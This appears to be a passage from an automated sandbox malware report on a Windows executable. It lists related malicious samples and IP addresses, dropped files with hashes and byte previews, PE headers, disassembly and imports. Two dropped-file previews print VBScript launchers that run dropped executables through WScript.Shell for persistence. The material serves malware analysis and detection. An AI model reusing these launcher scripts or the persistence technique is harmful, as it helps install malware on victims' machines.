                                                              powerpc.elfGet hashmaliciousUnknownBrowse
                                                              • 104.168.33.8
                                                              arm.elfGet hashmaliciousUnknownBrowse
                                                              • 23.94.242.130
                                                              sparc.elfGet hashmaliciousUnknownBrowse
                                                              • 23.94.242.130
                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                              • 107.175.130.16
                                                              i686.elfGet hashmaliciousUnknownBrowse
                                                              • 107.175.130.16
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                              • 194.15.112.248
                                                              setup-avast-premium-x64.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              setup-avast-premium-x64.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              ZipThis.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 194.15.112.248
                                                              https://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 194.15.112.248
                                                              anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                              • 194.15.112.248
                                                              37f463bf4616ecd445d4a1937da06e1923567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                              • 194.15.112.248
                                                              H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                              • 194.15.112.248
                                                              287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                              • 194.15.112.248
                                                              2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                              • 194.15.112.248
                                                              No context
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57976
                                                              Entropy (8bit):6.2713364951546815
                                                              Encrypted:false
                                                              SSDEEP:1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
                                                              MD5:CDD3D1BB178C391A905C40D2B292F4D6
                                                              SHA1:BF7FCE373510E8FAC054703F879C5AAC2E8ED584
                                                              SHA-256:F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
                                                              SHA-512:E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]...........................................................*...(....*..(....&*.s....%(....(.....o....o....o....*....(....*.s....%(.....o....u....r...po....o....*...(....*.0..=.......s...........(....(.....o....u....rM..p(..........o....o.....*.....(....*.0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.......*..(....@.%e..........Ft........'.\.........(....*.0..
                                                              Process:C:\Users\user\Desktop\9876567899.bat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):7.49286719631285
                                                              Encrypted:false
                                                              SSDEEP:3072:N2ARMlPdCDy+IbsJiWfuzCa67Lk493P8cyJewSm+6:fRMlPdvsXfYCa67Lk41P8LJD/+6
                                                              MD5:8C490D7318B04FEF5BCB3FFCF90F395F
                                                              SHA1:FC07558EB7F4BA34A513E845AB83F741CF2E7279
                                                              SHA-256:CB487810FE4D158B13BFB276C5800DE121417E31F9A47E7E141079F6DD87A2AC
                                                              SHA-512:8EEF04C31A446D640A44EA0F28E0ECD49C2B3DCB56E9185ACA1554E1017D7BFC08932EDCD2598DFC271ED7B19E7B0782D8C6A6E88AB5206CE831EAA4B8E8819E
                                                              Malicious:false
                                                              Preview:...XHFXGS9FG..O9.N0IUGG6wOKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9.GTCA&.@0.\.f.6..x.#/+g'K) &"".!/^':3gTRo9,6k/6g.v.g9,+\lC=CqGG67OKY..>.../...U..X....Y.......A...M..T..{...!...N...Q......./..^... ......N.j....Y..|....Q.e&(1..P.GW9FGTCOi.N0.TCG.?#.YXKFXGW9.GWBD8NN0qTGG.?OKYXK.aFW9VGTC.8BN0.UGW67OIYXNFYGW9FGQCN9BN0IUgM67KKYXKFXEW9.GTSO9RN0IUWG6'OKYXKFHGW9FGTCO9BN..TG#67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFX.V9.GTCO9BN0IUGG67OKYXKFXGW9FGTm;\::0IU.q77O[YXK~YGW=FGTCO9BN0IUGG6.OK9v9"9369F'.CO9.O0I.GG6.NKYXKFXGW9FGTC.9B..-43&67Oo.PKF.FW9DGTC18BN0IUGG67OKYX.FX.yAFGTCO9Bn0IUGM67oKYX.GXGW9FGTCO9BN0IUG.67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67OKYXKFXGW9FGTCO9BN0IUGG67
                                                              Process:C:\Users\user\Desktop\9876567899.bat.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1176576
                                                              Entropy (8bit):7.047932647192633
                                                              Encrypted:false
                                                              SSDEEP:24576:RqDEvCTbMWu7rQYlBQcBiT6rprG8ahmu9LHa7yyx:RTvC/MTQYxsWR7ahmiHaOy
                                                              MD5:6D9798801523EE1C8C5DC83D28346814
                                                              SHA1:66D6C6E65FFB8C635A286D68DE624EF5D469CF9B
                                                              SHA-256:62E0FAC7C5231AA0D8D5F0FDB9E64D8BDADF79934A26577282B7AFFBC557A5FB
                                                              SHA-512:9DFC24338CEE8DBBE830F4011D9B91FCAECBB861E75B19B9D28614F1D3B7D290DA4C1146251A09CB66B0B9872E7BF12C6899CA8090D1292CC0C11E2E0E700164
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....|g.........."..........D......w.............@..........................P......`<....@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v...~..............@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57976
                                                              Entropy (8bit):6.2713364951546815
                                                              Encrypted:false
                                                              SSDEEP:1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
                                                              MD5:CDD3D1BB178C391A905C40D2B292F4D6
                                                              SHA1:BF7FCE373510E8FAC054703F879C5AAC2E8ED584
                                                              SHA-256:F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
                                                              SHA-512:E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]...........................................................*...(....*..(....&*.s....%(....(.....o....o....o....*....(....*.s....%(.....o....u....r...po....o....*...(....*.0..=.......s...........(....(.....o....u....rM..p(..........o....o.....*.....(....*.0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.......*..(....@.%e..........Ft........'.\.........(....*.0..
                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):47
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:0D7DB7FF842F89A36B58FA2541DE2A6C
                                                              SHA1:50F3B486F99FB22648D26870E7A5CBA01CAED3DA
                                                              SHA-256:140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
                                                              SHA-512:6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
                                                              Malicious:false
                                                              Preview:...............................................
                                                              Process:C:\Users\user\AppData\Roaming\Dhy2kmz.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):81
                                                              Entropy (8bit):4.756456874631156
                                                              Encrypted:false
                                                              SSDEEP:3:FER/n0eFHHoUkh4EaKC59fAIn:FER/lFHI9aZ59oI
                                                              MD5:8028F309F7501839869CA60844BDD722
                                                              SHA1:6113DF5DEFFE12D7C1265C1660F4F83D0788E0EC
                                                              SHA-256:F7137F2CA35930385879FB80CBA99328C5B2A33E63B0D2BC5F4D3F0B2A25EA3A
                                                              SHA-512:56976F28EC179A1BED23B8EDF95DC1AAA1939FDBADE16A2701CC142E801C717A14AAFE3E793ADF692B92662979D553B6528506AB9EB812C984B5D83A4B3F3E57
                                                              Malicious:true
                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Wnuth.exe"""
                                                              Process:C:\Users\user\AppData\Local\preinhered\palladiums.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):284
                                                              Entropy (8bit):3.4111173001212505
                                                              Encrypted:false
                                                              SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1GOnB70nkSMBnriIM8lfQVn:DsO+vNlzQ1R70npMRmA2n
                                                              MD5:77E9EF8BEE8A9B0711F04E5DE06F8C0E
                                                              SHA1:D0753A3722C014A82DD51F4BBEC0B9F94EC48624
                                                              SHA-256:70A9A437059FC629BC5A0F342BD02762F177A57F22AA3C31C1B013D331BA5E93
                                                              SHA-512:7A673833197B0127AF4592E015DBE3290A3E1F2B69E0F4E64AD6BA4574E224A25C04B09E1857B83F003F078312EFB9912B0E84A377C0329FAC25769B71BDECDB
                                                              Malicious:true
                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.r.e.i.n.h.e.r.e.d.\.p.a.l.l.a.d.i.u.m.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                              Process:C:\Users\user\AppData\Roaming\Dhy2kmz.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:modified
                                                              Size (bytes):57976
                                                              Entropy (8bit):6.2713364951546815
                                                              Encrypted:false
                                                              SSDEEP:1536:6ooNFj7ZqmXI0pDApgjY2xqOJnYviJ/mH:6hV/PqH2sO2v2/Y
                                                              MD5:CDD3D1BB178C391A905C40D2B292F4D6
                                                              SHA1:BF7FCE373510E8FAC054703F879C5AAC2E8ED584
                                                              SHA-256:F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
                                                              SHA-512:E089BC47342B8FFE798E665F3D248DE711E704058717398B240809DB261E5226AD748F80F7E45AE1BB7EFA27196A9A520109CB633782394C90C13B0D79C0E41A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.|g................................. ........@.. ....................... ............`.....................................K.......................x............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........h..4]...........................................................*...(....*..(....&*.s....%(....(.....o....o....o....*....(....*.s....%(.....o....u....r...po....o....*...(....*.0..=.......s...........(....(.....o....u....rM..p(..........o....o.....*.....(....*.0..........ra..p(.....r...p(.....(....u.....s.....s...........o.....s............io....s....%..o....o.......+.....9......o.......9......o......9.....o.......*..(....@.%e..........Ft........'.\.........(....*.0..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.047932647192633
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:9876567899.bat.exe
                                                              File size:1'176'576 bytes
                                                              MD5:6d9798801523ee1c8c5dc83d28346814
                                                              SHA1:66d6c6e65ffb8c635a286d68de624ef5d469cf9b
                                                              SHA256:62e0fac7c5231aa0d8d5f0fdb9e64d8bdadf79934a26577282b7affbc557a5fb
                                                              SHA512:9dfc24338cee8dbbe830f4011d9b91fcaecbb861e75b19b9d28614f1d3b7d290da4c1146251a09cb66b0b9872e7bf12c6899ca8090d1292cc0c11e2e0e700164
                                                              SSDEEP:24576:RqDEvCTbMWu7rQYlBQcBiT6rprG8ahmu9LHa7yyx:RTvC/MTQYxsWR7ahmiHaOy
                                                              TLSH:E945BF0273C1C062FF9B92334F5AF6515BBC69660123A62F13A81DB9BD701B1563E7A3
                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                              Icon Hash:aaf3e3e3938382a0
                                                              Entrypoint:0x420577
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x677CF893 [Tue Jan 7 09:49:07 2025 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:948cc502fe9226992dce9417f952fce3
                                                              Instruction
                                                              call 00007F8AD0E109C3h
                                                              jmp 00007F8AD0E102CFh
                                                              push ebp
                                                              mov ebp, esp
                                                              push esi
                                                              push dword ptr [ebp+08h]
                                                              mov esi, ecx
                                                              call 00007F8AD0E104ADh
                                                              mov dword ptr [esi], 0049FDF0h
                                                              mov eax, esi
                                                              pop esi
                                                              pop ebp
                                                              retn 0004h
                                                              and dword ptr [ecx+04h], 00000000h
                                                              mov eax, ecx
                                                              and dword ptr [ecx+08h], 00000000h
                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                              mov dword ptr [ecx], 0049FDF0h
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              push esi
                                                              push dword ptr [ebp+08h]
                                                              mov esi, ecx
                                                              call 00007F8AD0E1047Ah
                                                              mov dword ptr [esi], 0049FE0Ch
                                                              mov eax, esi
                                                              pop esi
                                                              pop ebp
                                                              retn 0004h
                                                              and dword ptr [ecx+04h], 00000000h
                                                              mov eax, ecx
                                                              and dword ptr [ecx+08h], 00000000h
                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                              mov dword ptr [ecx], 0049FE0Ch
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              push esi
                                                              mov esi, ecx
                                                              lea eax, dword ptr [esi+04h]
                                                              mov dword ptr [esi], 0049FDD0h
                                                              and dword ptr [eax], 00000000h
                                                              and dword ptr [eax+04h], 00000000h
                                                              push eax
                                                              mov eax, dword ptr [ebp+08h]
                                                              add eax, 04h
                                                              push eax
                                                              call 00007F8AD0E1306Dh
                                                              pop ecx
                                                              pop ecx
                                                              mov eax, esi
                                                              pop esi
                                                              pop ebp
                                                              retn 0004h
                                                              lea eax, dword ptr [ecx+04h]
                                                              mov dword ptr [ecx], 0049FDD0h
                                                              push eax
                                                              call 00007F8AD0E130B8h
                                                              pop ecx
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              push esi
                                                              mov esi, ecx
                                                              lea eax, dword ptr [esi+04h]
                                                              mov dword ptr [esi], 0049FDD0h
                                                              push eax
                                                              call 00007F8AD0E130A1h
                                                              test byte ptr [ebp+08h], 00000001h
                                                              pop ecx
                                                              Programming Language:
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 SP1 build 30729
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x489f8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x7594.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0xd40000x489f80x48a008f302182e874b4f64aa5215488785fa5False0.9101461650172117data7.851754321313259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x11d0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                              RT_RCDATA0xdc7b80x3fcc0data1.000329108498653
                                                              RT_GROUP_ICON0x11c4780x76dataEnglishGreat Britain0.6610169491525424
                                                              RT_GROUP_ICON0x11c4f00x14dataEnglishGreat Britain1.25
                                                              RT_GROUP_ICON0x11c5040x14dataEnglishGreat Britain1.15
                                                              RT_GROUP_ICON0x11c5180x14dataEnglishGreat Britain1.25
                                                              RT_VERSION0x11c52c0xdcdataEnglishGreat Britain0.6181818181818182
                                                              RT_MANIFEST0x11c6080x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                              DLLImport
                                                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                              PSAPI.DLLGetProcessMemoryInfo
                                                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                              UxTheme.dllIsThemeActive
                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, 